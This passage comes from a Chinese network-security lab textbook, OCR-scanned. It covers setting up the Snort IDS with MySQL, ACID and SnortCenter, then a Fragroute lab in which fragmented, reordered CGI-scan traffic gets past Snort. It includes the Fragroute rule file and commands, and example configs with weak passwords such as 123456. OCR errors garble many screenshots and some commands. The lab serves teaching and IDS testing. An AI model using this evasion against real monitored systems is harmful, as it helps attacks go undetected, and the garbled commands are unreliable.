(3) 配置 MySQL。 创 建 一 个 mysql.bat 文件 ， 文 件 中 的 操作 包括 以 下 几 个 步骤 。 
e. 为 默认 root 账号 添加 口令 。 

e 删除 默认 的 any@% 账 号 。 

e 删除 默认 的 any@localhost 账号 。 

e 删除 默认 的 root@% 账 号 。 

如 图 9-5 所 示 ， 这 样 只 允许 root 从 localhost 连接 。 

(4) 随后 ， 在 文件 中 加 入 以 下 的 部 分 。 

@ 建立 Snort 运行 必需 的 snort 库 和 snort_archive JÆ: 

mysql>create database snort 

mysql>create database snort_archive 
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© UltraEdit-32 - [Edit2*] 


|| Ble Edt search Project 
[D & c? HSR 


c:\>cd_mysql\bin$ 
Filt 可 Fb:\>mysql mysql$ 
mysql»set password for "root"B"localhost" = password('erFl87tr32Gk');$ 
Open Files z] n ind = ad —— 
= Open Fies | * 
B deis ||'ysa1»delete from user where user-'' and host 
B cati*||vsal>delete from db where user-'' and host - '$'; 1 
mysql»delete from tables priv where user-'' and host - 'i';4 
mysql»delete from columns priv where user-'' and host = 't';$ 
3 
$ 
mysql>delete_from_user_vhere_user_=''_and_host, ocalhost';$ 
mysql»delete from db where user : and hos calhost';$ 
mysql»delete from tables priv where user-'' and host = 'localhost';$ 
mysql»delete from columns priv where user-'' and host- 'localhost';$ 
3 
3 


nlf 
i 
f 
1 
i 
i 
加 


图 9-5 mysql.bat 文件 
Q) 使 用 c:\snort\contrib 目录 下 的 create mysql 脚本 建立 Snort 运行 必需 的 数据 表 : 


c:\mysql\bin\mysql -D snort -u root -p<c:\snort\contrib\create_mysql 
c:\mysql\bin\mysql -D snort_archive -u root -p<c:\snort\contrib\create_ 
mysql 


4. 安装 ACID 
(1) 解压 缩 acid-0.9.6b23.targz 至 c:\apache2\htdocs\acid 目录 下 。 
(2) 按照 下 面 的 方式 修改 acid_confphp 文件 。 


$DBlib path-"c: \php\adodb"; 

$alert dbname-"snort"; 

$alert host-"localhost"; 

$alert port-""; 

$alert user-"acid"; 

$alert password-"log snort"; 
/*Archive DB connection parameters */ 
$archive dbname-"snort archive"; 
$archive host-"localhost"; 
$archive port-""; 

$archive user-"acid"; 

$archive password-"archive snort"; 


$ChartLib path="c:\php\jpgraph\src"; 

5. 安装 Winpcap 和 配置 Snort 

编辑 c:\snort\etc\snort.conf: 

(1) 把 “# var HOME NET 10.1.1.0/24” 改 成 “var HOME NET 192.168.0.0/24", iX 
是 内 部 局 域 网 的 地 址 ， 要 把 前 面 的 # 号 去 掉 。 

(2) 把 “var RULE PATH ../rules” 改 成 “var RULE_PATH /etc/snort”。 
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(3) 把 “# output database: log, mysql, user=root password-test dbname-db host- 


localhost" UJ, “output database: log, mysql, user=root password=123456 dbname=snort 
host=localhost”， 即 把 原来 默认 的 密码 改 成 自己 的 密码 ， 并 把 前 面 的 # 号 去 掉 。 
(4) 把 以 下 行 前 面 的 # 号 删除 ， 如 图 9-6 所 示 。 


#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 


UltraEdit-32 


$RULE PATH/web-attacks.rules 
$RULE PATH/backdoor.rules 
$RULE PATH/shellcode.rules 
$RULE PATH/policy.rules 
$RULE PATH/porn.rules 

$RULE PATH/info.rules 
$RULE_PATH/icmp-info.rules 
$RULE_PATH/virus.rules 
$RULE_PATH/chat. rules 
$RULE_PATH/multimedia. rules 
$RULE_PATH/p2p.rules 


[C:\Snort\etc\snort.conf*] 


[Open Files x] 


on Files 


CNSnortVetclsnor 


include $RULE PATH/sql.rules$ 
include $RULE PATH/xi1.rules$ 
include $RULE PATH/icmp.rules$ 

inc lude $RULE PATH/netb ios.rules$ 

include $RULE PATH/misc.rules$ 

include $RULE PATH/attack-responses.rules$ 
include $RULE PATH/oracle.rules$ 

include $RULE PATH/mysql.rules$ 

include $RULE PATH/snmp.rules$ 

$ 

include $RULE PATH/smtp. 
include $RULE PATH/imap. 
include $RULE PATH/pop2. 
include $RULE PATH/pop3. 
$ 

include $RULE PATH/nntp.rules$ 
include $RULE PATH/other-ids.rules$ 
include $RULE PATH/web-attacks.rules$ 
include $ RULE PATH/backdoor .rules$ 
inc lude $RULE PATH/shel lcode.rules$ 
include $RULE PATH/policy.rules$ 
include $RULE PATH/porn.rules$ 


rules$ 
rules$ 
rules$ 
rules$ 


inc lude $RULE PATH/info.rules$ 

include $RULE PATH/icmp-info.rules$ 
include $RULE PATH/virus.rules$ 
include $RULE PATH/chat.rules$ 
include $RULE PATH/multimedia.rules$ 
linciude $RULE PATH/p2p.rules$ 

include $RULE PATH/experimental.rules$ 
include $RULE PATH/local.rules$ 


图 9-6 ”修改 后 的 snort.conf 文件 
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(5) 其 他 需要 修改 的 地 方 。 
将 include classification.config 以 及 include reference.config 改 为 绝对 路 径 ， 如 图 9-7 
所 示 。 


Q UltraEdit-32 - [C\Snort\ete\snort.conf] EE 
| Ee Edt search project wiew Format Column Maco advanced Window Help 
[D c c HSR HA wl EE) se & Bl E Ex ES |[steationcomoy] h a tim a 


{| Haiti] Edit2e snort, conf | snert 连 接 sql server. txt | 
p # EXAMPLE RULE FOR SUSPICIOUS RULETYPE:$ 
Fut gf H suspicious $HOME NET any -» $HOME NET 6667 (msg:"Internal IRC Server";)$ 


Poen ries x] | g This example will create a rule type that will log to_syslog$ 


wn Files #_and a mysql_database. $ 
ceana] | #_culecype_redalerc$ 
Edti* Hae 
Edti* # — type alert$ 
JiprojectiDstan| f output alert syslog: LOG AUTH LOG ALERTS 
H output database: log, mysql, user-snort dbname-snort host-localhost$ 
HOS 
LE 
#_ EXAMPLE RULE FOR REDALERT RULETYPES 
HW redalert $HOME NET any -» $EXTERNAL NET 31337 (msg:"Someone is being LEET"; V$ 
#__ flags:A+:)$ 
$ 
aS 
#_Include_c:\snort\etc\classification_¢ priority _settings$ 
Li 


include_c:\snort\ete\classification.config$ 
$ 

#9 
#_Include_c:\snort\etc\reference_systems$ 
LE] 

s 

include_c:\snort\etc\reference.config$ 


图 9-7 配置 snort.conf 


6. 设置 Snort 输出 alert 到 MySQL Server 
(1) 编辑 ci\snort\etc\snort.conf。 


output database:alert, mysql, host=localhost user=snort password=snort 
dbname=snort 
encoding=hex detail=full 


(2) 测试 Snort 是 否 正常 工作 。 

c:\snort\bin>snort -c "c:\snort\etc\snort.conf" -1 "c:\snort\logs" -d -e -X 

-X 参数 用 于 在 数据 链接 层 记录 raw packet 数据 。 

-d 参数 记录 应 用 层 的 数据 。 

-e 参数 显示 / 记录 第 二 层 报 文 头 数据 。 

-c 参数 用 以 指定 Snort 的 配置 文件 的 路 径 。 

运行 以 上 命令 之 后 的 结果 如 图 9-8 所 示 。 

(3) 按 下 Ctrl C 键 之 后 将 停止 Snort 的 工作 ， 其 结果 如 图 9-9 所 示 。 

7. 增加 Snort 页 面 启动 管理 功能 

(1) SnortCenter 是 一 个 基于 Web 的 Snort 探 针 和 规则 管理 系统 , 用 于 远程 修改 Snort 
探 针 的 配置 ， 启 动 、 停 止 探 针 ， 编 辑 、 分 发 Snort 特征 码 规则 。 

下 载 地 址 : http://users.pandora.be/larc/download/， 如 图 9-10 所 示 。 
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Server reascambly: INACTIVE 
Client ra. mbly: ACTIVE 
Reassembler alerts: ACTIVE 
Ports: 21 23 25 53 80 110 111 143 513 1432 
Emergency Ports: 21 23 25 5] HO 110 111 143 513 143) 
Ltp drcude arguments: 
Unicode decoding 
118 alternate Unicode decading 
115 double encoding vuln 
Flip backslash to slash 
Include additional whitespace separators 
Ports to decode http on: 88 
c decode arguments: 
Ports co decode RPC on: 111 32771 
alert fragnents: INACTIVE 
alert_large_fragments: ACTIVE 
alert incomplete: ACTIVE 
alert_nultiple requests: ACTIVE 
elnet_decode arguments: 
Ports to decade telnet on: 21 23 25 119 
331 Snort rules read... 
331 Option Chains linked into 139 Chain Headers 
Dynanic rules 
ariraseseverereresereseresereseressereserepereveno 


le application order: ->act ivation->dynamic—>alert->pats->log 
---- Initialization Complete ==-- 


*» Snort? <x 

ersion 2.8.@-ODBC-MySQL-WIN32 (Build 72> 

y Martin Roesch <roesch@sourcefire.com, ww.snort.org> 

-?-MIN32 Port By Michael Davis (nike@datanerds.net, www-datanerds -net/“nike> 
-8 - 2.8 WIN32 Port By Chris Reid (chris.reid&codecraftconsultants.com? 


图 9-8 运行 结果 


Discarded<timeout>: Ø 
Frag2 memory faults: Ø 


TCP Stream Reassembly Stats: 


TCP Packets Used: 181 «86.3252» 
Strean Trackers: 12 
Stream flushe: 9 
Segnents used: 9 
Strean4 Memory Faults: @ 


Snort exiting 


€:\Snort\bin>, 


9-9 运行 结果 


T 


Pistense Dais / Version Format DURER EA M cc 
2002-05-14 7 1.0-RC1 | SnortCenter 1.0-RC1 for Snort Zi inortcenter-vi; O-RCT tar gs 
You aed to do a fresh neta new DD 1 
2002-01-08 / 1.0beta | SnortCenter 1.0 beta for Snort 1.9 nortcenter-bate,tange 
You need to do a fresh install in a nev DB I 
387 6:9. norte: ze for Snort 1.9. = 


Anaon heo y http:// php.' com/adodb 
httpi//curl. haxx.2e/download.html (compiled with SSL, if you vant ssl support) 


is tar, Solaris users should use gnu tar. 
Windows Users, You need to copy tar.exe $ quntip.exe to your ‘winnt’ directory 


图 9-10 下载 SnortCenter 
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(2) 下 载 完 毕 后 ,在 Linux 环境 下 执行 以 下 命令 。 


cp snortcenter-vl.0-RCl.tar.gz /usr/local/apache/htdocs 
tar zxvf snortcenter-vl.0-RCl.tar.gz 
mv www SC 


vi sc.php/ 
在 sc.php 文件 中 更 改 以 下 内 容 。 


$DBlib_path="/usr/local/apache/htdocs/adodb/"; 

$curl_path="/usr/bin"; 

SDBtype-"mysql"; 

$DB dbname-"snortcenter"; //#$DB_dbname JÈ MySQL 数据 库 SnortCenter DB 名 称 


$DB host-"localhost"; //*$DB host 是 DB 存储 的 主机 名 
$DB_user="root"; //*$DB user 是 登录 到 数据 库 的 用 户 名 
$DB_password="123456"; //*$DB password 是 用 户 的 登录 密码 
$DB port-""; /4$DB port 是 访问 端口 


(3) 修改 好 后 ， 保 存 退 出 。 
然后 创建 SnortCenter 的 数据 库 ， 执 行 如 下 命令 。 


Mysql-uroot-p123456 
create database snortcenter; 
quit; 


(4) 随后 在 浏览 器 中 输入 “http:/192.168.0.11/sc”， 它 会 自动 创建 数据 表 ， 然 后 再 次 
登录 会 要 求 输入 用 户 名 和 密码 ， 初 始 是 admin 和 change， 如 图 9-11 所 示 。 
(5) 然后 安装 snortcenter-agent-v1.0-RC1 .tar.gz。 


cp snortcenter-agent-v1.0-RCl.tar.gz /opt 

cd /opt 

tar zxvf snortcenter-agent-vl.0-RCl.tar.gz 

cd sensor 

./setup.sh /7 回答 几 个 问题 即 完成 安装 ,默认 端口 2525 
cp /etc/snort.conf /etc/snort.eth0.conf 


C60 通过 菜单 项 可 以 选择 增加 一 个 嗅 探 器 ， 如 图 9-12 所 示 。 


SnortCenter v1.0 


SnortCenter User Authentication 


Login name: — | 


图 9-11 登录 SnortCenter 图 9-12 增加 一 个 嗅 探 器 
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(7) 创建 新 的 嗅 探 器 的 界面 如 图 9-13 所 示 。 


图 9-13 ”创建 新 的 嗅 探 器 


【实验 环境 】 
在 测试 报告 中 记录 下 写 入 MySQL 数据 库 中 的 数据 包 ， 并 将 抓 图 附 在 实验 报告 后 面 
(如 表 9-1 所 示 )。 


表 9-1 实验 报告 
ARP (a 
一 分 名 内 snon 折 到 的 数据 妾 |  | | | 
Pi son mage | | | | 
【思考 题 】 


(1) 阐述 基于 Snort 的 误 用 检测 原理 。 
(2) 体会 使 用 SnortCenter 和 不 使 用 该 软件 时 管理 入 侵 检测 系统 的 差别 。 


9.3 3 Snort 进行 碎片 攻击 测试 _ 


【实验 目的 】 
(1) fE Linux 环境 下 学 会 使 用 简单 的 黑客 工具 Fragroute。 
(2) 学 习 使 用 Snort 对 碎片 攻击 的 检测 。 


【原理 简介 】 

早 在 1999 年 5 月 ，Dug Song 就 发 布 了 一 个 类 似 的 工具 一 一 Fragroute。 这 个 工具 是 
网 络 入 侵 检 测 系统 (NIDS ) 性 能 测试 套件 一 NIDSbench 的 一 个 部 分 。 顾 名 思 义 ,Fragroute 
是 一 个 具有 路 由 器 功能 的 应 用 程序 ， 它 能 够 对 攻击 者 发 送 的 攻击 流量 进行 分 片 处 理 后 ， 
向 攻击 目标 转发 。 

Fragroute 技术 主要 是 在 网 络 层 和 传输 控制 层 上 发 起 攻击 。 这 是 最 早 被 攻击 者 采用 的 
攻击 方式 。 攻 击 者 构造 坏 的 IP 包头 域 ,使 攻击 目标 能 够 丢弃 这 个 包 ， 而 让 NIDS 能 够 接 
受 这 个 数据 包 ， 从 而 在 NIDS 接收 的 数据 中 插入 无 效 的 数据 。 不 过 ， 这 种 技术 有 两 个 问 


95 


mem 网络 安全 实验 教程 (第 2 版 ) memeeueuuuum: 


题 : 路 由 器 会 丢弃 这 种 数据 包 ， 因 此 这 种 技术 很 难 用 于 远程 攻击 ， 除 非 NIDS 和 攻击 者 
是 在 同一 个 局 域 网 中 ， 另 外 一 个 问题 是 NIDS 是 否 能 够 以 攻击 者 设想 的 方式 解释 具有 坏 
包头 的 数据 包 。 例 如 ， 如 果 使 用 错误 的 IP 包头 的 大 小 ， 会 使 NIDS 无 法 定位 传输 控制 层 
的 位 置 ， 因 此 ,不 是 每 个 IP 包头 的 域 都 是 可 以 使 用 的 。 一 般 使 用 校 验 和 、TTL 和 不 可 分 
Fr CDF) 等 包头 域 。 

校 验 和 域 的 错误 很 容易 被 NIDS 忽视 。 有 的 NIDS 不 校 验 数据 包 的 校 验 和 ， 因 此 不 
会 丢弃 校 验 和 错误 的 数据 包 。 但 是 , 绝 大 多 数 系统 的 TCP/IP 协议 栈 都 会 丢弃 校 验 和 错误 
的 他 数据 包 。 

当 路 由 器 准备 将 IP 分 组 发 送 到 网 络 上 ， 而 该 网 络 又 无 法 将 这 个 IP 分 组 一 次 全 部 发 
送 时 ， 路 由 器 必须 将 分 组 分 成 小 块 ， 使 其 长 度 能 够 满足 这 一 网 络 对 分 组 大 小 的 限制 ， 这 
些 分 割 出 来 的 小 块 就 叫 作 碎片 (fragmentation)。IP 分 组 可 以 独立 地 通过 不 同 的 路 径 转发 ， 
使 得 碎片 只 有 到 达 目 的 主机 之 后 才 可 能 汇集 到 一 块 ， 而 且 碎 片 不 一 定 按照 次 序 到 达 。 到 
达 目 的 主机 后 ， 目 的 主机 会 重组 IP 碎片 。 

当 一 个 路 由 器 分 割 一 个 IP 分 组 时 , 要 把 IP. 分 组 头 的 大 多 数 段 值 复制 到 每 个 碎片 中 ， 
其 中 16 位 的 标志 符 是 必须 复制 的 段 ， 它 能 够 唯一 地 标志 一 个 IP 分 组 ， 使 目的 主机 能 够 
判断 每 个 碎片 所 属 的 IP 分 组 ， 而 且 每 个 碎片 中 都 包含 偏 移 值 ， 用 来 标记 碎片 在 IP 分 组 
中 的 位 置 。 

由 于 目标 系统 能 够 重组 IP 碎片 ， 因 此 需要 网 络 入 侵 检测 系统 具有 重组 IP 碎片 的 能 
力 。 如 果 网 络 入 侵 检测 系统 没有 重组 IP 碎片 的 能 力 ， 将 无 法 检测 通过 IP 碎片 进入 的 攻 
击 数据 。 不 过 ， 现 在 的 网 络 入 侵 检测 产品 基本 都 具有 良好 的 卫 碎片 重组 能 力 ， 因 此 基本 
上 IP 碎片 问题 不 会 给 网 络 入 侵 检测 系统 造成 太 大 的 麻烦 。 但 是 ， 像 碎片 重 登 之 类 的 技术 
仍然 会 带 来 很 大 的 问题 。 

1. 基本 的 重组 问题 

IP 碎片 通常 会 按照 顺序 到 达 目 的 地 ， 最 后 碎片 的 MF 位 为 0 表示 这 是 最 后 一 个 碎 
FO. A, IP 碎片 有 可 能 不 按照 顺序 到 达 ， 目 标 系统 必须 能 够 重组 碎片 。 但 是 ， 如 果 
网 络 入 侵 检测 系统 总 是 假设 IP 碎片 是 按照 顺序 到 达 ， 就 会 出 现 漏 报 的 情况 。 攻 击 者 可 以 
打 乱 碎片 的 到 达 顺 序 ， 达 到 欺骗 IDS 的 目的 。 

除 此 之 外 还 有 一 个 问题 ，IDS 必须 把 IP 碎片 保存 到 一 个 缓冲 区 里 ， 等 所 有 的 碎片 到 
达 之 后 重组 IP 分 组 。 如 果 攻 击 者 不 送出 所 有 的 碎片 ， 就 可 能 使 那些 缓存 所 有 碎片 的 IDS 
消耗 掉 所 有 内 存 。 目 标 系统 必须 有 处 理 这 种 情况 的 能 力 。 一 些 系 统 会 根据 TIL， 丢 弃 碎 
Fro IDS 必须 以 和 目标 系统 相同 的 方式 处 理 碎片 ， 如 果 IDS 接收 被 监视 的 主机 丢弃 的 碎 
片 流 ， 就 会 被 攻击 者 插入 垃圾 数据 ， 如 果 IDS 丢弃 被 监视 系统 接收 的 数据 ， 就 可 能 遗漏 

2. 碎片 重 又 问题 

目前 ， 主 要 有 两 种 技术 用 于 逃避 检测 设备 的 监视 。 第 一 种 是 使 用 尽 可 能 小 的 碎片 ， 
例如 ， 每 个 碎片 只 有 8B 碎片 最 小 8B)， 而 每 个 碎片 中 都 没有 足够 的 信息 ， 从 而 逃 过 检 
测 。 但 是 ， 现 在 的 包 过 滤 设 备 一 般 会 主动 丢弃 这 种 碎片 ， 入 侵 检测 设备 也 会 发 出 碎片 攻 
击 的 报警 ， 因 此 这 种 逃避 方式 很 难 奏效 。 
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另外 一 种 方式 就 是 碎片 重合。 在 IP 分 组 中 有 一 个 13 位 的 域 (Fragment Offset)， 标 
识 每 个 碎片 在 原始 IP 分 组 中 的 偏 移 。 构 造 错误 的 碎片 偏 移 值 ， 可 能 造成 碎片 的 重 著 。 

frag) 负载 的 数据 偏 移 值 为 0( 也 就 是 第 一 个 碎片 ，， 大 小 是 256, 而 第 二 个 碎片 frag2 
的 数据 偏 移 是 248， 造 成 了 两 个 碎片 的 部 分 数据 重合 。 这 样 会 使 某 个 碎片 的 数据 覆盖 掉 
另 一 个 碎片 的 重合 数据 。 而 哪 一 个 碎片 重 倒 部 分 的 数据 被 覆盖 由 操作 系统 决定 。 


【实验 环境 】 

1. 硬件 环境 

(1) 4847 Windows XP 和 Red Hat Linux 9.0 双 系 统 的 PC 两 台 ，PC 上 安装 TP-LINK 
网 卡 一 个 。 一 台 PC 作为 攻击 方 ， 另 一 台 PC 作为 被 攻击 方 。 

(2) RJ-45 网 线 若 干 。 

2. 软件 环境 

攻击 方 计算 机 上 安装 了 Fragroute 软件 和 一 个 简单 的 CGI 扫描 器 ， 而 被 攻击 方 计算 
机 上 则 安装 了 Snort 和 Apache。 


【实验 步骤 】 

Fragroute 可 以 拦截 、 修 改 、 重 写 、 重 排 发 往 特 定 机 器 的 数据 包 ， 几 乎 可 以 完全 控制 
数据 包 的 发 送 方式 ， 满 足 实验 所 需 的 各 种 攻击 ， 成 为 攻击 和 测试 IDS 产品 的 利器 。 

1. 简单 测试 

测试 通过 两 台 机 器 进行 ，x.x.x.x 与 y.y.y.y 都 是 安装 了 Red Hat 的 机 器 ，x.x.x.x 机 器 
作为 发 起 攻击 的 机 器 ,上面 安装 了 Fragroute 和 一 个 简单 的 CGI 扫描 器 。y.y.y.y 作为 受 攻 
击 的 机 器 ， 上 面 安装 了 Snort 和 Apache， 在 Apache 的 cgi-bin 目录 中 故意 放 入 了 几 个 有 
漏洞 的 脚本 。 测 试 分 两 次 进行 ， 第 一 次 是 正常 攻击 情况 ， 第 二 次 是 打开 Fragroute 后 的 情 
况 。 两 次 测试 中 ， 除 了 第 二 次 中 打开 Fragroute 碎片 转发 外 ， 其 他 如 Snort 的 启动 方式 、 
CGI 扫描 的 方式 都 是 完全 一 样 的 。 

(1) 在 被 攻击 方 计算 机 上 运行 Snot 命令 ， 并 在 启动 Snort 的 时 候 看 一 下 Snort 的 版 
本 ， 如 图 9-14 所 示 。 


—-== Initialization Complete --—— 


nee — Snort? <- 
o" 2" Version 2.6.1.4-ODBC-MySQL-MSSQL-FlexRESP-WIN32 (Build 54) 
na By Martin Roesch & The Snort Team: http://www.snort.org/tean.html 
<C> Copyright 1998-2887 Sourcefire Inc., et al. 


图 9-14 Snort 的 版 本 
两 次 测试 中 启动 Snort 的 命令 行为 : 


[root@y.y.y.y /var/log/snort]>snort -qdv -c /root/.snortrc -A fast host 


X.X.X.X 
(2) 在 攻击 方 计算 机 上 启动 CGI 扫描 器 的 命令 。 
[root@x.x.x.x exploit]# ./cgihk y.y.y.y 
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攻击 方 计算 机 上 显示 的 扫描 结果 如 图 9-15 所 示 。 


HITP/1.1 200 OK 

Date: Tue, 23 Apr 2002 13:03:20 GMT 

Server: Apeche/1.3.22 (Unix) PHP/4.1.2 mod ssl/2.8.5 OpenSSL/0.9. 6b 
X-Powered-By: PHP/4.1.2 

Set-Cookie: PHPSESSID=ed9866 d876372e265833e46f5e6026£; peth=/ 

Expires: Thu, 19 Nov 1981 08:52:00 GMT 

Cache-Control: no-store, no-ceche, must-revelidete, post-check-0, pre-check-0 
Pregne: no-ceche 

Connection: close 

Content-Type: text/html 


Seerching for phf : Not Found 
Seerching for Count.cgi : Not Found 
Searching for test-cei : Found!! 
Searching for php. cei : Not Found 
Searching for hendler : Not Found 
Searching for webgeis : Not Found 
Searching for websendmail : Not Found 
Searching for webdist.cgi : Found!! 
Searching for fexsurvey : Not Found 
Searching for htmlscript : Not Found 
Searching for pfdispley : Not Found 
Searching for perl. Not Found 
Searching for wwwboerd pl : Found!! 


图 9-15 扫描 结果 


2. 在 TCP 包 不 分 片 攻击 情况 下 的 扫描 结果 
正常 攻击 情况 下 Snort 的 记录 如 图 9-16 所 示 。 


[root@y. y. y. y /var/log/snort]> ls -1 


torr 20 
3 root root 8192 Apr 23 21:22 . 
T root root 4096 Apr 23 10:21 
2 root root 4096 Apr 23 21:22 
1 root root 2061 Apr 23 21:22 


图 9-16 正常 攻击 情况 下 Snort 的 记录 


图 9-17 显示 的 是 Snort 检测 出 的 CGI 扫描 攻击 。 


[**] [1:466:4] ICMP L3retriever Ping [**] 

[Classification: attempted Information Leak] [Priority: 2] 
04/17-14:31:58.905320 8:0:EB:75:05:7B -> 0:11:2F:56:Eh:9B type:0x800 len: Ox4A 
192.168.0.13 -> 192.168.0.123 ICMP TTL:32 TOS:0x0 ID:3722 IpLen:20 DgnLen:69 
Type:8 Code:6 ID:512 Seq:768 ECHO 

[Xref => httpz//uww.uhitehats.con/info/IDS311] 


[**] [1:466:4] ICMP L3retriever Ping [**] 

[Classification: attempted Information Leak] [Priority: 2] 
04/17-14:32:00.920269 9:h:EB:75:D5:7B -> 0:11:2F:56:E4:9B type:0x800 len: Ox4A 
192.168.0.13 -> 192.168.0.123 ICMP TTL:32 TOS:0x0 ID:3730 IpLen:20 Dgnlen:60 
Type:8 Code:@ ID:512 Seq:1624 ECHO 

[Xref => httpz//ww.vhitehats.con/info/IDS311] 


[**] [1:2404:5] NETBIOS SMB-DS Session Setup RndX request unicode username overflow attempt [**] 
[Classification: Attempted Administrator Privilege Gain] [Priority: 1] 

04/17-14:32:03.981340 0:8:EB:75:D5:7B -> 0:11:2F:56:E4:9B type:0x800 len: Ox1As 

192.168.0.13:1151 -> 192.168.9.123:445 TCP TTL:128 TOS:0x0 ID:3738 IpLen:28 DgnLen:^06 DF 

xxhPxxx Seq: Ox5C858993 Ack: OxB8C99059 Win: @xFE43 TcpLen: 20 

[Xref => httpz//ww.eeye.con/htnl/Research/Rdvisories/RD2004226.htnl][XreF => http://ww.securityFocus .com/bid/9752] 


[**] [1:2466:7] NETBIOS SMB-DS IPC$ unicode share access [**] 
[Classification: Generic Protocol Command Decode] [Priority: 3] 

04/17-14:32:04.506953 0:A:EB:75:D5:7B -> 0:11:2F:56:E4:9B type:0x800 len:0x98 
192.168.8.13:1151 -> 192.168.9.123:445 TCP TTL:128 TO0S:8x0 ID:3739 IpLen:26 DgmLen:158 DF 
exhPxxx Seq: 9x5C858B91 Ack: OxB8C990D2 Win: GxFDCA TcpLen: 28 


图 9-17 CGI 扫描 攻击 记录 


98 


AE 


下 面 是 正常 攻击 情况 下 ， 攻 击 过 程 中 交换 的 数据 包 其 中 一 例 。 
扫描 请 求 包 如 图 9-18 所 示 。 


服务 器 回 


数据 ， 打 乱 发 送 次 序 并 夹杂 着 虚假 重 传 包 。 有 具体 操作 如 图 9-20 所 示 。 


04/23-21:22:48. 584284 x :1210 -> y y y y:80 

TCP TTL:54 TOS:0x0 ID:54477 IpLen:20 DenLen:79 DF 

XWkAPbk* Seq: Oz5533DAD2 Ack: OxS6QAZ31B Win: Ox16D0 TepLen: 32 
TCP Options (3) => NOP NOP TS: 4197914 3968556 

4T 45 54 20 2F 63 6T 69 2D 62 69 6E 2F TO 68 66 GET /cei-bin/phf 
20 48 54 54 50 2F 31 2E 30 OA OA HITP/1.0. . 


=+=+=+=+=+=+=+=+4=+=+=+4=+=+=+=+=+=: 


图 9-18 扫描 请 求 包 


应 包 如 图 9-19 所 示 。 


04/23-21 :22:48. 584284 y. y. y. y:80 -> 
0 ID:44344 IpLen:20 DenLen:522 DF 
X*xkPbkk Seq: Ox569A231B Ack: Ox5533DAED Wim: Oxl6A0 TepLen: 32 


TCP Options (3) => NOP NOP TS: 3968556 4197914 
48 54 54 50 2F 31 2E 31 20 34 30 34 20 4E GF 74 


HITP/1.1 404 Not 


20 46 BF 75 BE 64 OD OA 44 61 T4 65 3A 20 54 T5 Found .Date: Tu 
65 2C 20 32 33 20 41 70 72 20 32 30 30 32 20 31 e, 23 Apr 2002 1 
33 3A 32 32 3A 34 38 20 4T 4D 54 OD OA 53 65 T2 3:22:48 GMT..Ser 
76 65 T2 3A 20 41 70 61 63 68 65 2F 31 2E 33 2E ver: Apache/1.3. 
32 32 20 28 55 GE 69 78 29 20 50 48 50 2F 34 2E 22 (Unix) PHP/4. 
31 2E 32 20 BD BF 64 SF 73 73 BC 2F 32 2E 38 2E 1.2 mod ss1/2.8. 
35 20 4F 70 65 BE 53 53 4C 2F 30 2E 39 2E 36 62 5 OpenSSL/0. 9. 6b 
OD OA 43 BF BE 6E 65 63 74 69 BF BE 3A 20 63 6C ..Connection: cl 
BF 73 65 OD OA 43 6F 6E 74 65 BE 74 2D 54 T9 70 ose. .Content-Typ 
B5 3A 20 T4 65 78 T4 2F 68 T4 6D 6C 3B 20 63 68 t/html; ch 
61 72 T3 65 T4 3D 69 73 6F 2D 38 38 35 39 2D 31 1so-86859-1 
OD OA OD OA 3C 21 44 4F 43 54 59 50 45 20 48 54 .. CIDOCTYPE HT 
4D 4C 20 50 55 42 4C 49 43 20 22 2D 2F 2F 49 45 ML PUBLIC ^-//IE 
54 46 2F 2F 44 54 44 20 48 54 4D 4C 20 32 2E 30 TF//DTD HTML 2.0 
2F 2F 45 4E 22 3E OA 3C 48 54 4D 4C 3E 3C 48 45 /EN > CHTML>OE 
41 44 3E OA 3C 54 49 54 4C 45 3E 34 30 34 20 4E AD). TITLE^404 N 
BF 74 20 46 BF T5 BE 64 3C 2F 54 49 54 4C 45 3E ot Found</TITLE> 
OA 3C 2F 48 45 41 44 3E 3C 42 4F 44 59 3E OA 3C . </HEAD><BODYD. < 
48 31 3E 4E BF T4 20 46 BF T5 BE 64 3C 2F 48 31 Hi>Not Found</Hi 
3E OA 54 B8 65 20 72 65 T1 T5 65 73 T4 65 64 20 > The requested 
55 52 4C 20 2F 63 67 69 2D 62 69 6E 2F 70 68 66 URL /cei-bin/phf 
20 TT 61 T3 20 6E 6F 74 20 66 BF T5 BE 64 20 BF wes not found o 
BE 20 T4 68 69 73 20 73 65 72 T6 65 T2 2E 3C SO n this server. P 
3E OA 3C 48 52 3E OA 3C 41 44 44 52 45 53 53 3E >. CHRD. «ADDRESS? 
41 70 61 63 88 65 2F 31 2E 33 2E 32 32 20 53 65  Apsche/17X.22 Se 


图 9-19 服务 器 回应 包 
3. 在 TCP 碎片 攻击 情况 下 的 Snort 记录 


再 次 对 y.y-y.y 进行 同样 的 CGI 扫描 攻击 ， 同 时 在 攻击 机 器 上 打开 Fragroute 碎片 转 
发 ， 对 攻击 数据 包 进行 TCP 碎片 处 理 。 对 Fragroute 设 定 的 规则 是 TCP 包 每 片 一 个 字 节 


[rootüx. x.x.x root]# cet /tmp/freg. txt 
tcp seg 1 

tcp cheff rexmit 

order rendom 


[rootüx.x.x.x root]# fregroute -f /tmp/ freg. txt y. y. y. y. 


fregroute: tcp seg -> tcp cheff -> order 


图 9-20 TCP 碎片 攻击 
查看 TCP 碎片 攻击 后 的 攻击 记录 (如 图 9-21 所 示 )。 


* 
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+=+=+=+=+=+=+=+=+=+=+= 十 


4=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 
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从 图 9-21 中 可 以 看 到 全 部 是 误 报 ， 攻 击 已 经 被 有 效 地 隐蔽 过 去 了 。 


[rootüy. y. y. y /var/log/snort]? cat alert 
04/23-21 :22:48.584284 [++] [1:886:3] WEB-CGI phf access [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} x.x.x.x:1210 -> 


Se n 48.584284 [++] [1:1149:3] WEB-MISC count. cgi access [+*+] [Classification: Attempted Information Leak] [Priority: 2] {TCP} x.x.x.x:1211 -> 
Saree ze 48.584284 [++] [1:835:1] WEB-CGI test-cgi access [+*+] [Classification: Attempted Information Leak] [Priority: 2] {TCP} x.x.x.x:1212 -> 
pnr en 48.804284 [++] [1:824:2] WEB-CGI php access [++] [Classification: Attempted Information Leek] [Priority: 2] {TCP} x.x.x.x:1213 -> 

pr en 48.604284 [+r] [1:1141:2] WEB-MISC handler access [++] [Clessification: Attempted Information Leak] [Priority: 2] {TCP} x.x.x.x:1214 -> 
rene 48.604284 [++] [1:838:2] WEB-CGI webgais access [t+] [Classification: Attempted Information Leak] [Priority: 2] {TCP} x.x.x.x:1218 -> 
